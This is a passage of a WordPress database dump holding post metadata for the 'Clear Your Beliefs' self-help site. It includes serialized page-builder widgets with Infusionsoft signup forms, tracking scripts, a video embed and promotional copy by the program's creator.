]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1671, 139, 'rt_custom_css', ''),
(1672, 139, 'panels_data', 'a:0:{}'),
(1673, 2094, '_edit_lock', '1454314160:2'),
(1674, 2094, '_edit_last', '2'),
(1675, 2094, '_wp_page_template', 'default'),
(1676, 2094, 'rt_custom_css', ''),
(1677, 2094, 'panels_data', 'a:0:{}'),
(1682, 1132, 'rt_custom_css', ''),
(1683, 1132, 'panels_data', 'a:0:{}'),
(1694, 2107, '_wp_attached_file', '2015/03/demopic.png'),
(1695, 2107, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:400;s:6:"height";i:150;s:4:"file";s:19:"2015/03/demopic.png";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"demopic-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:19:"demopic-300x112.png";s:5:"width";i:300;s:6:"height";i:112;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:19:"demopic-220x150.png";s:5:"width";i:220;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:19:"demopic-170x150.png";s:5:"width";i:170;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1707, 2110, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:211;s:6:"height";i:211;s:4:"file";s:19:"2014/05/211x211.gif";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"211x211-150x150.gif";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/gif";}s:15:"product-preview";a:4:{s:4:"file";s:19:"211x211-170x200.gif";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:9:"image/gif";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(1706, 2110, '_wp_attached_file', '2014/05/211x211.gif'),
(1801, 2134, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1800, 2134, '_menu_item_target', ''),
(1799, 2134, '_menu_item_object', 'page'),
(1798, 2134, '_menu_item_object_id', '2119'),
(1797, 2134, '_menu_item_menu_item_parent', '0'),
(1796, 2134, '_menu_item_type', 'post_type'),
(1739, 2119, '_edit_lock', '1426645735:2'),
(1740, 2119, '_edit_last', '2'),
(1741, 2119, '_wp_page_template', 'default'),
(1742, 2119, 'rt_custom_css', ''),
(1743, 2119, 'panels_data', 'a:0:{}'),
(1746, 2121, '_edit_lock', '1484270207:2'),
(1747, 2121, '_edit_last', '2'),
(1750, 2121, 'rt_custom_css', ''),
(1751, 2121, 'panels_data', 'a:0:{}'),
(1753, 2124, '_menu_item_type', 'post_type'),
(1754, 2124, '_menu_item_menu_item_parent', '0'),
(1755, 2124, '_menu_item_object_id', '1720'),
(1756, 2124, '_menu_item_object', 'page'),
(1757, 2124, '_menu_item_target', ''),
(1758, 2124, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1759, 2124, '_menu_item_xfn', ''),
(1760, 2124, '_menu_item_url', ''),
(1762, 2125, '_menu_item_type', 'post_type'),
(1763, 2125, '_menu_item_menu_item_parent', '0'),
(1764, 2125, '_menu_item_object_id', '1450'),
(1765, 2125, '_menu_item_object', 'page'),
(1766, 2125, '_menu_item_target', '_blank'),
(1767, 2125, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1768, 2125, '_menu_item_xfn', ''),
(1769, 2125, '_menu_item_url', ''),
(1868, 2158, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1677:"[su_box title="The App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99 for Rapid Release Technology</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:561:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://www.clearbeliefs.com" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1787, 2133, '_menu_item_type', 'post_type'),
(1869, 2159, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1649:"[su_box title="The App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the App</strong>\nfor iPhone &#038; iPad\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Only $4.99!</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:561:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://www.clearbeliefs.com" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1867, 1450, 'rt_custom_css', ''),
(1788, 2133, '_menu_item_menu_item_parent', '0'),
(1789, 2133, '_menu_item_object_id', '2119'),
(1790, 2133, '_menu_item_object', 'page'),
(1791, 2133, '_menu_item_target', ''),
(1792, 2133, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(1793, 2133, '_menu_item_xfn', ''),
(1794, 2133, '_menu_item_url', ''),
(1802, 2134, '_menu_item_xfn', ''),
(1803, 2134, '_menu_item_url', ''),
(1819, 2136, '_edit_lock', '1426582490:2'),
(1820, 2136, '_edit_last', '2'),
(1823, 2136, 'rt_custom_css', ''),
(1824, 2136, 'panels_data', 'a:0:{}'),
(1839, 1141, 'rt_custom_css', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
